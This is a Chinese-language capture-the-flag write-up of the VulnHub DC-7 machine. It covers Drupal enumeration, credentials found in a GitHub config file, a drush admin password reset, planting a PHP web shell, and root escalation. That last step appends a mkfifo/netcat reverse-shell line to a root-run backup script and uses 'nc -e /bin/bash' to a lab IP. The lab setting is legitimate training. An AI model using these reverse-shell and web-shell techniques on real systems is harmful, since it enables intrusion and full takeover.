环境

下载地址:https://download.vulnhub.com/dc/DC-7.zip

开始打靶

存活IP扫描
image-20230710154535976
访问页面,内容为Drupal的CMS
image-20230710154607577
页面上面没啥东西,但是页面下有
image-20230710154617505
百度一下这个用户发现为其GitHub
image-20230710154627596
访问其config.php得到数据库账号密码,但是登录不上却可以登录ssh
image-20230710154646095
连接如下image-20230710154656166
打开mbox发现存在/opt/scripts/backups.sh
image-20230710154719484
访问其目录,查看backups.sh
image-20230710154736908
发现有个drush命令,但是不知道其作用,搜索后发现这个命令可以修改密码,进入到var/www/html使用其命令修改

1
drush user-password admin --password="123456"

然后利用这个账号密码去登陆
image-20230710154749303
在Content—>Add content–>Basic page下准备写马但是不支持,将php进行引入!image-20230710154758394
如下
image-20230710154812450
然后把这个扩展开启了再进入刚刚那个界面
image-20230710154820011
然后写入木马
image-20230710154835443
最后用4连上了,奇奇怪怪
image-20230710154845834

提权

进入opt目录,写入打开终端然后写入提权的语句

1
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.75.128 6666 >/tmp/f" >> backups.sh

emmmm,使用这个命令成功了但是执行命令老是失败,弹个shell试试

1
nc -e /bin/bash 192.168.75.158 6666

image-20230710154855636
执行命令,这里要稍微等一会儿
image-20230710154922627
拿到root权限
image-20230710154932069